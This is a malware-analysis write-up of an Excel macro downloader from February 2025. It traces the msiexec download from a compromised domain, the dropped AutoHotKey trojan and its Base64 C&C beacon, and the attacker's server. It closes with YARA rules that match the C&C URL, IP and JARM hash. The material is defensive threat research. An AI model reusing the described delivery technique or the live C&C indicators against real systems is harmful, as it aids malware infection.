In the present article I analyze a macro downloader threat which has been modified for the last time on 13th February 2025. When opened, it presents the following Excel image which represents a fake document.
The hash of the analyzed threat is 29ab17e91744c5e639dbfa1a84deb66eb30582b28e78dc8a7181ba90426dcd23
By analyzing the metadata of the macro malware we can see the author of the modifications is “bsAdmin”, the datetime of the last modification of the Excel document is 13th February 2025 at 16:27 (UTC).
Here we have the reference to the VBA macro code:
The sheet of the malicious document has a sheetProtection with password hashed with the SHA512 algorithm:
After removing the sheetProtection we can see the following document:
Following are all the macros code, in which we can see also the placing of the image of the document with ActiveSheet.Pictures and the parameters 8888-8887 which gives 1 as result to access the first image in The Auto_Open function. The Main macro is empty.
By performing a deep analysis of drawing1.xml metadata document we can see the reference to the downloader URL as “InstallProduct” function parameter in the ActiveXObject call with variable “r”. The specific URL acusense[.]ae/umbrella is currently “empty”.
There is a reference to the folder C:\Users\bsAdmin\Desktop\NEW SEND associated to the development of the malicious macro document.
The following are the metadata details of the vbaProject with information related to ContentType and the attribute of macro enabling setting “application/vnd.ms-excel.sheet.macroEnabled.main+xml”.
Here are the attributes of the Sheet1 and the Workbook of the Excel document, extracted without LibreOffice macro editor.
By analyzing a detonation of the macro malware we can see associations to msiexec.exe child process execution which performs connections to the URL acusense[.]ae/umbrella. Following are also dropping operations associated to AutoHotKey threat AutoNotify.ahk and the dropped Portable Executable AutoNotify.exe
The hash of the Trojan artifact dropped is 6a98b438b67da7316e9251eb1a92cd5384a8349d239a77903f7282fa076a77c3. Here are the details of the Base64 encoded C&C external connection:
By decoding the payload details of the C&C connection we can see the details of the victim, like sessionid, userid, host details and the etag, which can be used to track the connection session itself.
The C&C domain acusense[.]ae has been registered by Cloudns[.]io and for the Certificate subject we can see a mysitepreview.co.uk domain:
The domain in question is present in a recent Pulse (IOCs container) of 14th February 2025:
The site has been developed with PHP 8.1.31 and WordPress 6.7.2:
The domain acusense[.]ae is related to several malicious macro threats and it seems it was originally a licit domain of smart security cameras but compromised to use it in malicious contexts and infections:
The IP address 181.49.105[.]59, related to C&C communications, has been registered by Telmex Colombia S.A. in Colombia. There are a lot of open ports, such as 80 (HTTP), 137 (NetBIOS), 445 (SMB), 1433 (MSSQL), 5985 (WinRM), 8009 (APACHE_JSERV).
The port 7070 is related to AnyDesk remote control:
The server in question has the Apache Tomcat 8.5.39 version:
The JARM certificate 2ad2ad16d2ad2ad22c2ad2ad2ad2adfd9c9d14e4f4f67f94f0359f8b28f532 is also related to other malicious or suspicious IP addresses:
YARA rule:
import "vt"
rule macro_13th_February_2025_Downloader {
meta:
description = "Detects Macro Downloader threat developed on 13th February 2025"
condition:
vt.net.url.raw icontains "https://acusense.ae/umbrella" or vt.net.url.raw icontains "181.49.105.59"
}
import "vt"
rule macro_13th_February_2025_Downloader_JARM
{
meta:
name = "Detects Macro Downloader threat developed on 13th February 2025 with JARM thumbprint"
condition:
vt.net.ip.jarm == "2ad2ad16d2ad2ad22c2ad2ad2ad2adfd9c9d14e4f4f67f94f0359f8b28f532"
}
CONCLUSIONS:
Recently the macro malware threats are growing their malicious use of licit compromised domains to make easier the bypass of analysis of recently registered domains. For example, some SIEM platforms analyze recently registered domains as suspicious with analysis rules to spot on domains used for malicious purposes. Also the methods for C&C communications are really interesting for their structure and remote access functionalities.